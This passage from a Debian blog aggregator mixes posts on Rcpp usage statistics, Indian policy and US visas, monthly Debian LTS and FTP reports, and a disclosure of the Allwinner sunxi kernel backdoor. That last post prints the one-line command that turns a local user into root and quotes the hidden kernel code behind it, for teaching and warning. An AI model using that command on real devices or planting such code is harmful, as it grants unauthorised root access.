15:    RmixmodCombi     1.0              R(>= 3.0.2), Rmixmod(>= 2.0.1), Rcpp(>= 0.8.0), methods,\ngraphics
16:             rrr   1.0.0                                                                    R (>= 3.2.0)
17:        UncerIn2     2.0                          R (>= 3.0.0), sp, RandomFields, automap, fields, gstat
R> 
There are a full seventeen packages which claim to depend on Rcpp while not having any compiled code of their own. That is likely false---but I keep them in my counts, however relunctantly. A CRAN-declared Depends: is a Depends:, after all. Another nice thing to look at is the total number of package that declare that they need compilation:
R> ## number of packages with compiled code
R> dat[ , .(N=.N), by=NeedsCompilation]
   NeedsCompilation    N
1:               no 7625
2:              yes 2832
3:               No    1
R>
Isn't that awesome? It is 2832 out of (currently) 10458, or about 27.1%. Just over one in four. Now the 998 for Rcpp look even better as they are about 35% of all such packages. In order words, a little over one third of all packages with compiled code (which may be legacy C, Fortran or C++) use Rcpp. Wow. Before closing, one shoutout to Dirk Schumacher whose thankr which I made the center of the last post is now on CRAN. As a mighty fine and slim micropackage without external dependencies. Neat.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

30 January 2017

Shirish Agarwal: Different strokes

Delhi Metro - courtesy wikipedia.org Statutory warning It s a long read. I start by sharing I regret, I did not hold onto the Budget and Economics 101 blog post for one more day. I had been holding/thinking on to it for almost couple of weeks before posting, if I had just waited a day more, I would have been able to share an Indian Express story . While I thought that the work for the budget starts around 3 months before the budget, I came to learn from that article that it takes 6 months. As can be seen in the article, it is somewhat of a wasted opportunity, part of it probably due to the Government (irrespective of any political party, dynasty etc.) mismanagement. What has not been stated in the article is what I had shared earlier, reading between the lines, it seems that the Government isn t able to trust what it hears from its advisers and man on the street. Unlike Chanakya and many wise people before him who are credited with advising about good governance, that a good king is one who goes out in disguise, learns how his/er subjects are surviving, seeing what ills them and taking or even not taking corrective steps after seeing the problem from various angles. Of course it s easier said then done, though lot of Indian kings did try and ran successful provinces. There were also some who were more interested in gambling, women and threw/frittered away their kingdoms. The 6-month things while not being said in the Express article is probably more about checking and re-checking figures and sources to make sure they are able to read whatever pattern the various Big Businesses, Industry, Social Welfare schemes and people are saying I guess. And unless mass digitalization as well as overhaul of procedures, Right to Information (RTI) happens, don t see any improvement in the way the information is collected, interpreted and shared with the public at large. It would also require people who are able to figure out how things work sharing the inferences (right or wrong) through various media so there is discussion about figures and policy-making. Such researchers and their findings are sadly missing in Indian public discourses and only found in glossy coffee table books :(. One of the most basic question for instance is, How much of any policy should be based on facts and figures and how much giving fillip to products and services needed in short to medium term ? Also how much morality should play a part in Public Policy ? Surprisingly, or probably not, most Indian budgets are populist by nature with some scientific basis but most of the times there is no dialog about how the FM came to some conclusion or Policy-making. I am guessing a huge part of that has also to do with basic illiteracy as well as Economic and Financial Illiteracy. Just to share a well-known world-over example, one of the policies where the Government of India has been somewhat lethargic is wired broadband penetration. As have shared umpteen times, while superficially broadband penetration is happening, most of the penetration is the unreliable and more expensive mobile broadband penetration. While this may come as a shock to many of the users of technology, BSNL, a Government company who provides broadband for almost 70-80% of the ADSL wired broadband subscribers gives 50:1 contention ratio to its customers. One can now understand the pathetic speeds along with very old copper wiring (20 odd years) on which the network is running. The idea/idiom of running network using duct-tape seems pretty apt in here  Now, the Government couple of years ago introduced FFTH Fiber-to-the-home but because the charges are so high, it s not going anywhere. The Government could say 10% discount in your Income Tax rates if you get FFTH. This would force people to get FFTH and would also force BSNL to clean up its act. It has been documented that a percentage increase in broadband equals a similar percentage rise in GDP. Having higher speeds of broadband would mean better quality of streaming video as well as all sorts of remote teaching and sharing of ideas which will give a lot of fillip to all sorts of IT peripherals in short, medium and long-term as well. Not to mention, all the software that will be invented/coded to take benefit of all that speed. Although, realistically speaking I am cynical that the Government would bring something like this  Moving on Behind a truck - Courtesy TheEconomist.com Another interesting story which I had shared was a bit about World History Now the Economist sort of confirmed how things are in Pakistan. What is and was interesting that the article is made by a politically left-leaning magazine which is for globalization, business among other things . So, there seem to be only three options, either I and the magazine are correct or we both are reading it wrong. The third and last option is that the United States realize that Pakistan can no longer be trusted as Pakistan is siding more and more with Chinese and Russians, hence the article. Atlhough it seems a somewhat far-fetched idea as I don t see the magazine getting any brownie points with President Trump. Unless, The Economist becomes more hawkish, more right-wingish due to the new establishment. I can t claim to have any major political understanding or expertise but it does seem that Pakistan is losing friends. Even UAE have been cautiously building bridges with us. Now how this will play out in the medium to long-term depends much on the personal equations of the two heads of state, happenings in geopolitics around the world and the two countries, decisions they take, it is a welcome opportunity as far they (the Saudis) have funds they want to invest and India can use those investments to make new infrastructure. Now, I need a bit of help of Java and VCS (Version control system) experts . There is a small game project called Mars-Sim. I asked probably a few more questions than I should have and the result was that I was made a member of the game team even though I had shared with them that I m a non-coder. I think such a game is important as it s foss. Both the game itself is foss as well as its build-tools with a basic wiki. Such a game would be useful not only to Debian but all free software distributions. Journeying into the game Unfortunately, the game as it is currently, doesn t work with openjdk8 but private conversations with the devs. have shared they will work on getting it to work on OpenJDK 9 which though is sometime away. Now as it is a game, I knew it would have multiple multimedia assets. It took me quite sometime to figure out where most of the multimedia assets are. I was shocked to find that there aren t any tool/s in Debian as well a GNU/Linux to know about types of content is there inside a directory and its sub-directories. I framed it in a query and found a script as an answer . I renamed the script to file-extension-information.sh (for lack of imagination of better name). After that, I downloaded a snapshot of the head of the project from https://sourceforge.net/p/mars-sim/code/HEAD/tree/ where it shows a link to download the snapshot. https://sourceforge.net/code-snapshots/svn/m/ma/mars-sim/code/mars-sim-code-3847-trunk.zip unzipped it and then ran the script on it [$] bash file-extension-information.sh mars-sim-code-3846-trunk
theme: 1770
dtd: 31915
py: 10815
project: 5627
JPG: 762476
fxml: 59490
vm: 876
dat: 15841044
java: 13052271
store: 1343
gitignore: 8
jpg: 3473416
md: 5156
lua: 57
gz: 1447
desktop: 281
wav: 83278
1: 2340
css: 323739
frag: 471
svg: 8948591
launch: 9404
index: 11520
iml: 27186
png: 3268773
json: 1217
ttf: 2861016
vert: 712
ogg: 12394801
prefs: 11541
properties: 186731
gradle: 611
classpath: 8538
pro: 687
groovy: 2711
form: 5780
txt: 50274
xml: 794365
js: 1465072
dll: 2268672
html: 1676452
gif: 38399
sum: 23040
(none): 1124
jsx: 32070
It gave me some idea of what sort of file were under the repository. I do wish the script defaulted to showing file-sizes in KB if not MB to better assess how the directory is made up but not a big loss . The above listing told me that at the very least theme, JPG, dat, wav, png, ogg and lastly gif files. For lack of better tools and to get an overview of where those multimedia assets used ncdu [shirish@debian] - [~/games/mars-sim-code-3846-trunk] - [10210]
[$] ncdu mars-sim/
--- /home/shirish/games/mars-sim-code-3846-trunk/mars-sim --------------------------------------------------------------------------------------
46.2 MiB [##########] /mars-sim-ui
15.2 MiB [### ] /mars-sim-mapdata
8.3 MiB [# ] /mars-sim-core
2.1 MiB [ ] /mars-sim-service
500.0 KiB [ ] /mars-sim-main
188.0 KiB [ ] /mars-sim-android
72.0 KiB [ ] /mars-sim-network
16.0 KiB [ ] pom.xml
12.0 KiB [ ] /.settings
4.0 KiB [ ] mars-sim.store
4.0 KiB [ ] mars-sim.iml
4.0 KiB [ ] .project
I found that all the media is distributed randomly and posted a ticket about it. As I m not even a java newbie, could somebody look at mokun s comment and help out please ? On the same project, there has been talk of migrating to github.com Now whatever little I know of git, it makes a copy of the whole repository under .git/ folder/directory so having multimedia assets under git is a bad, bad idea, as each multimedia binary format file would be unique and no possibility of diff. between two binary files even though they may be the same file with some addition or subtraction from earlier version. I did file a question but am unhappy with the answers given. Can anybody give some definitive answers if they have been able to do how I am proposing , if yes, how did they go about it ? And lastly Immigrants of the United States in 2000 by country of birth America was founded by immigrants. Everybody knows the story about American Indians, the originals of the land were over-powered by the European settlers. So any claim, then and now that immigration did not help United States is just a lie. This came due to a conversation on #debconf by andrewsh
[18:37:06] I d be more than happy myself to apply for an US tourist not transit visa when I really need it, as a transit visa isn t really useful, is just as costly as a tourist visa, and nearly as difficult to get as a tourist visa
[18:37:40] I m not entirely sure I wish to transit through the US in its Trumplandia incarnation either
[18:38:07] likely to be more difficult and unfun
FWIW I am in complete agreement with Andrew s assessment of how it might be with foreigners. It has been on my mind and thoughts for quite some time although andrewsh put it eloquently. But as always I m getting ahead of myself. The conversation is because debconf this year would be in Canada. For many a cheap flight, one of the likely layovers/stopover can be the United States. I actually would have gone one step further, even if it was cheap transit visa, it would equally be unfun as it would discriminate. About couple of years back, a friend of mine while explaining what visa is, put it rather succinctly the visa officer looks at only 3 things a. Your financial position something which tells that you can take care of your financial needs if things go south b. You are not looking to settle there unlawfully c. You are not a criminal. While costs do matter, what is disturbing more is the form of extremism being displayed therein. While Indians from the South Asian continent in US have been largely successful, love to be in peace (one-off incidents do and will happen anywhere) if I had to take a transit or tourist visa in this atmosphere, it would leave a bad taste in the mouth. When one of my best friends is a Muslim, 20% of the population in India is made of Muslims and 99% of the time both of us co-exist in peace I simply can t take any alternative ideology. Even in Freakonomics 2.0 the authors when they shared that it s less than 0.1 percent of Muslims who are engaged in terrorist activities, if they were even 1 percent than all the world s armed forces couldn t fight them and couldn t keep anyone safe. Which simply means that 99.99% of even all Muslims are good. This resonates strongly with me for number of reasons. One of my uncles in early to late 80 s had an opportunity for work to visit Russia for official work. He went there and there were Secret Police after him all the time. While he didn t know it, I later read it, that it was SOP (Standard Operating Procedure) when all and any foreigners came visiting the country, and not just foreigners, they had spies for their own citizens. Russka a book I read several years ago explained the paranoia beautifully. While U.S. in those days was a more welcoming place for him. I am thankful as well as find it strange that Canada and States have such different visa procedures. While Canada would simply look at the above things, probably discreetly inquire about you if you have been a bad boy/girl in any way and then make a decision which is fine. For United States, even for a transit visa I probably would have to go to Interview where my world view would probably be in conflict with the current American world view. Interestingly, while I was looking at conversations on the web and one thing that is missing there is that nobody has talked about intelligence community. What Mr. Trump is saying in not so many words is that our intelligence even with all the e-mails we monitor and everything we do, we still can t catch you. It almost seems like giving a back-handed compliment to the extremists saying you do a better job than our intelligence community. This doesn t mean that States doesn t have interesting things to give to the world, Star Trek conventions, Grand Canyon (which probably would require me more than a month or more to explore even a little part), NASA, Intel, AMD, SpaceX, CES (when it s held) and LPC (Linux Plumber s conference where whose who come to think of roadmap for GNU/Linux). What I wouldn t give to be a fly in the wall when LPC, CES happens in the States. What I actually found very interesting is that in the current Canadian Government, if what I read and heard is true, then Justin Trudeau, the Prime Minister of Canada made 50 of his cabinet female. Just like in the article, studies even in Indian parliament have shown that when women are in power, questions about social justice, equality, common good get asked and policies made. If I do get the opportunity to be part of debconf, I would like to see, hear, watch, learn how the women cabinet is doing things. I am assuming that reporting and analysis standards of whatever decisions are more transparent and more people are engaged in the political process to know what their elected representatives are doing. Mountain biking in British Columbia, Canada - source wikipedia.org One another interesting point I came to know is that Canada is home to bicycling paths. While I stopped bicycling years ago  as it has been becoming more and more dangerous to bicycle here in Pune as there is no demarcation for cyclists, I am sure lot of Canadians must be using this opportunity fully. Lastly, on the debconf preparation stage, things have started becoming a bit more urgent and hectic. From a monthly IRC meet, it has now become a weekly meet. Both the wiki and the website are slowly taking up shape. http://deb.li/dc17kbp is a nice way to know/see progress of the activities happening . One important decision that would be taken today is where people would stay during debconf. There are options between on-site and two places around the venue, one 1.9 km around, the other 5 km. mark. Each has its own good and bad points. It would be interesting to see which place gets selected and why.
Filed under: Miscellenous Tagged: #budget, #Canada, #debconf organization, #discrimination, #Equal Opportunity, #Fiber, #svn, #United States, #Version Control, Broadband, Git, Pakistan, Subversion

30 June 2016

Chris Lamb: Free software activities in June 2016

Here is my monthly update covering a large part of what I have been doing in the free software world (previously):
Debian My work in the Reproducible Builds project was covered in our weekly reports. (#58, #59 & #60)
Debian LTS

This month I have been paid to work 18 hours on Debian Long Term Support (LTS). In that time I did the following:
  • "Frontdesk" duties, triaging CVEs, etc.
  • Extended the lts-cve-triage.py script to ignore packages that are not subject to Long Term Support.

  • Issued DLA 512-1 for mantis fixing an XSS vulnerability.
  • Issued DLA 513-1 for nspr correcting a buffer overflow in a sprintf utility.
  • Issued DLA 515-1 for libav patching a memory corruption issue.
  • Issued DLA 524-1 for squidguard fixing a reflected cross-site scripting vulnerability.
  • Issued DLA 525-1 for gimp correcting a use-after-free vulnerability in the channel and layer properties parsing process.

Uploads
  • redis (2:3.2.1-1) New upstream bugfix release, plus subsequent upload to the backports repository.
  • python-django (1.10~beta1-1) New upstream experimental release.
  • libfiu (0.94-5) Misc packaging updates.


RC bugs

I also filed 170 FTBFS bugs against a7xpg, acepack, android-platform-dalvik, android-platform-frameworks-base, android-platform-system-extras, android-platform-tools-base, apache-directory-api, aplpy, appstream-generator, arc-gui-clients, assertj-core, astroml, bamf, breathe, buildbot, cached-property, calf, celery-haystack, charmtimetracker, clapack, cmake, commons-javaflow, dataquay, dbi, django-celery, django-celery-transactions, django-classy-tags, django-compat, django-countries, django-floppyforms, django-hijack, django-localflavor, django-markupfield, django-model-utils, django-nose, django-pipeline, django-polymorphic, django-recurrence, django-sekizai, django-sitetree, django-stronghold, django-taggit, dune-functions, elementtidy, epic4-help, fcopulae, fextremes, fnonlinear, foreign, fort77, fregression, gap-alnuth, gcin, gdb-avr, ggcov, git-repair, glance, gnome-twitch, gnustep-gui, golang-github-audriusbutkevicius-go-nat-pmp, golang-github-gosimple-slug, gprbuild, grafana, grantlee5, graphite-api, guacamole-server, ido, jless, jodreports, jreen, kdeedu-data, kdewebdev, kwalify, libarray-refelem-perl, libdbusmenu, libdebian-package-html-perl, libdevice-modem-perl, libindicator, liblrdf, libmail-milter-perl, libopenraw, libvisca, linuxdcpp, lme4, marble, mgcv, mini-buildd, mu-cade, mvtnorm, nose, octave-epstk, onioncircuits, opencolorio, parsec47, phantomjs, php-guzzlehttp-ringphp, pjproject, pokerth, prayer, pyevolve, pyinfra, python-asdf, python-ceilometermiddleware, python-django-bootstrap-form, python-django-compressor, python-django-contact-form, python-django-debug-toolbar, python-django-extensions, python-django-feincms, python-django-formtools, python-django-jsonfield, python-django-mptt, python-django-openstack-auth, python-django-pyscss, python-django-registration, python-django-tagging, python-django-treebeard, python-geopandas, python-hdf5storage, python-hypothesis, python-jingo, python-libarchive-c, python-mhash, python-oauth2client, python-proliantutils, python-pytc, python-restless, python-tidylib, python-websockets, pyvows, qct, qgo, qmidinet, quodlibet, r-cran-gss, r-cran-runit, r-cran-sn, r-cran-stabledist, r-cran-xml, rgl, rglpk, rkt, rodbc, ruby-devise-two-factor, ruby-json-schema, ruby-puppet-syntax, ruby-rspec-puppet, ruby-state-machine, ruby-xmlparser, ryu, sbd, scanlogd, signond, slpvm, sogo, sphinx-argparse, squirrel3, sugar-jukebox-activity, sugar-log-activity, systemd, tiles, tkrplot, twill, ucommon, urca, v4l-utils, view3dscene, xqilla, youtube-dl & zope.interface.

FTP Team

As a Debian FTP assistant I ACCEPTed 186 packages: akonadi4, alljoyn-core-1509, alljoyn-core-1604, alljoyn-gateway-1504, alljoyn-services-1504, alljoyn-services-1509, alljoyn-thin-client-1504, alljoyn-thin-client-1509, alljoyn-thin-client-1604, apertium-arg, apertium-arg-cat, apertium-eo-fr, apertium-es-it, apertium-eu-en, apertium-hbs, apertium-hin, apertium-isl, apertium-kaz, apertium-spa, apertium-spa-arg, apertium-tat, apertium-urd, arc-theme, argus-clients, ariba, beast-mcmc, binwalk, bottleneck, colorfultabs, dh-runit, django-modeltranslation, dq, dublin-traceroute, duktape, edk2, emacs-pdf-tools, eris, erlang-p1-oauth2, erlang-p1-sqlite3, erlang-p1-xmlrpc, faba-icon-theme, firefox-branding-iceweasel, golang-1.6, golang-defaults, golang-github-aelsabbahy-gonetstat, golang-github-howeyc-gopass, golang-github-oleiade-reflections, golang-websocket, google-android-m2repository-installer, googler, goto-chg-el, gr-radar, growl-for-linux, guvcview, haskell-open-browser, ipe, labplot, libalt-alien-ffi-system-perl, libanyevent-fcgi-perl, libcds-savot-java, libclass-ehierarchy-perl, libconfig-properties-perl, libffi-checklib-perl, libffi-platypus-perl, libhtml-element-library-perl, liblwp-authen-oauth2-perl, libmediawiki-dumpfile-perl, libmessage-passing-zeromq-perl, libmoosex-types-portnumber-perl, libmpack, libnet-ip-xs-perl, libperl-osnames-perl, libpodofo, libprogress-any-perl, libqtpas, librdkafka, libreoffice, libretro-beetle-pce-fast, libretro-beetle-psx, libretro-beetle-vb, libretro-beetle-wswan, libretro-bsnes-mercury, libretro-mupen64plus, libservicelog, libtemplate-plugin-datetime-perl, libtext-metaphone-perl, libtins, libzmq-ffi-perl, licensecheck, link-grammar, linux, linux-signed, lua-busted, magics++, mkalias, moka-icon-theme, neutron-vpnaas, newlisp, node-absolute-path, node-ejs, node-errs, node-has-flag, node-lodash-compat, node-strip-ansi, numba, numix-icon-theme, nvidia-graphics-drivers, nvidia-graphics-drivers-legacy-304xx, nvidia-graphics-drivers-legacy-340xx, obs-studio, opencv, pacapt, pgbackrest, postgis, powermock, primer3, profile-sync-daemon, pyeapi, pypandoc, pyssim, python-cutadapt, python-cymruwhois, python-fisx, python-formencode, python-hkdf, python-model-mommy, python-nanomsg, python-offtrac, python-social-auth, python-twiggy, python-vagrant, python-watcherclient, python-xkcd, pywps, r-bioc-deseq2, r-bioc-dnacopy, r-bioc-ensembldb, r-bioc-geneplotter, r-cran-adegenet, r-cran-adephylo, r-cran-distory, r-cran-fields, r-cran-future, r-cran-globals, r-cran-htmlwidgets, r-cran-listenv, r-cran-mlbench, r-cran-mlmrev, r-cran-pheatmap, r-cran-pscbs, r-cran-r.cache, refind, relatorio, reprotest, ring, ros-ros-comm, ruby-acts-as-tree, ruby-chronic-duration, ruby-flot-rails, ruby-numerizer, ruby-u2f, selenium-firefoxdriver, simgrid, skiboot, smtpping, snap-confine, snapd, sniffles, sollya, spin, subuser, superlu, swauth, swift-plugin-s3, syncthing, systemd-bootchart, tdiary-theme, texttable, tidy-html5, toxiproxy, twinkle, vmtk, wait-for-it, watcher, wcslib & xapian-core.

14 May 2016

Gunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems

In the ARM world, to which I am still mostly a newcomer (although I've been already playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed. Some time later, I also discussed on my blog on how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux. In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingenier a, UNAM. It has been quite successful And fun. Anyway, one of the points we make emphasis on to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot an irony. As part of the "Linux Userspace" and "Boot process" modules, we make a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system: Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... The people we already know and trust to do this kind of work! Most current ARM chips cannot run with the stock, upstream Linux kernel. Then require a set of patches that different vendors pile up to support their basic hardware (remember those systems are almost always systems-on-a-chip (SoC)). Some vendors do take the hard work to try to upstream their changes that is, push the changes they did to the kernel for inclusion in mainstream Linux. This is a very hard task, and many vendors just abandon it. So, in many cases, we are stuck running with nonstandard kernels, full with huge modifications... And we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right? Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... A very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel. This kernel has a very ugly flaw: A debugging mode left open, that allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:
  1. Debian GNU/Linux 8 bananapi ttyS0
  2. banana login: gwolf
  3. Password:
  4. Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
  5. Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l
  6. The programs included with the Debian GNU/Linux system are free software;
  7. the exact distribution terms for each program are described in the
  8. individual files in /usr/share/doc/*/copyright.
  9. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
  10. permitted by applicable law.
  11. gwolf@banana:~$ id
  12. uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
  13. gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
  14. gwolf@banana:~$ id
  15. groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)
Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):
  1. if(!strncmp("rootmydevice",(char*)buf,12))
  2. cred = (struct cred *)__task_cred(current);
  3. cred->uid = 0;
  4. cred->gid = 0;
  5. cred->suid = 0;
  6. cred->euid = 0;
  7. cred->euid = 0;
  8. cred->egid = 0;
  9. cred->fsuid = 0;
  10. cred->fsgid = 0;
  11. printk("now you are root\n");
Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines the file is not documented nor commented at all. Peeking around other files in the repository, it gets obvious that many files lack from this same basic issue and having this upstreamed will become a titanic task. If their programmers tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the needed amount of work. Anyway, enough said by me. Some other sources of information: There are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

30 April 2016

Chris Lamb: Free software activities in April 2016

Here is my monthly update covering a large part of what I have been doing in the free software world (previously):
Debian My work in the Reproducible Builds project was covered in our weekly reports. (#48, #49, #50, #51 & #52)
Uploads
  • redis (2:3.0.7-3) Adding, amongst some other changes, systemd LimitNOFILE support to allow a higher number of open file descriptors.


FTP Team

As a Debian FTP assistant I ACCEPTed 135 packages: aptitude, asm, beagle, blends, btrfs-progs, camitk, cegui-mk2, cmor-tables, containerd, debian-science, debops, debops-playbooks, designate-dashboard, efitools, facedetect, flask-testing, fstl, ganeti-os-noop, gnupg, golang-fsnotify, golang-github-appc-goaci, golang-github-benbjohnson-tmpl, golang-github-dchest-safefile, golang-github-docker-go, golang-github-dylanmei-winrmtest, golang-github-hawkular-hawkular-client-go, golang-github-hlandau-degoutils, golang-github-hpcloud-tail, golang-github-klauspost-pgzip, golang-github-kyokomi-emoji, golang-github-masterminds-semver-dev, golang-github-masterminds-vcs-dev, golang-github-masterzen-xmlpath, golang-github-mitchellh-ioprogress, golang-github-smartystreets-assertions, golang-gopkg-hlandau-configurable.v1, golang-gopkg-hlandau-easyconfig.v1, golang-gopkg-hlandau-service.v2, golang-objx, golang-pty, golang-text, gpaste, gradle-plugin-protobuf, grip, haskell-brick, haskell-hledger-ui, haskell-lambdabot-haskell-plugins, haskell-text-zipper, haskell-werewolf, hkgerman, howdoi, jupyter-client, jupyter-core, letsencrypt.sh, libbpp-phyl, libbpp-raa, libbpp-seq, libbpp-seq-omics, libcbor-xs-perl, libdancer-plugin-email-perl, libdata-page-pageset-perl, libevt, libevtx, libgit-version-compare-perl, libgovirt, libmsiecf, libnet-ldap-server-test-perl, libpgobject-type-datetime-perl, libpgobject-type-json-perl, libpng1.6, librest-client-perl, libsecp256k1, libsmali-java, libtemplates-parser, libtest-requires-git-perl, libtext-xslate-perl, linux, linux-signed, mandelbulber2, netlib-java, nginx, node-rc, node-utml, nvidia-cuda-toolkit, openfst, openjdk-9, openssl, php-cache-integration-tests, pulseaudio, pyfr, pygccxml, pytest-runner, python-adventure, python-arrayfire, python-django-feincms, python-fastimport, python-fitsio, python-imagesize, python-lib389, python-libtrace, python-neovim-gui, python3-proselint, pythonpy, pyzo, r-cran-ca, r-cran-fitbitscraper, r-cran-goftest, r-cran-rnexml, r-cran-rprotobuf, rrdtool, ruby-proxifier, ruby-seamless-database-pool, ruby-syslog-logger, rustc, s5, sahara-dashboard, salt-formula-ceilometer, salt-formula-cinder, salt-formula-glance, salt-formula-heat, salt-formula-horizon, salt-formula-keystone, salt-formula-neutron, salt-formula-nova, seer, simplejson, smrtanalysis, tiles-autotag, tqdm, tran, trove-dashboard, vim, vulkan, xapian-bindings & xapian-core.

Next.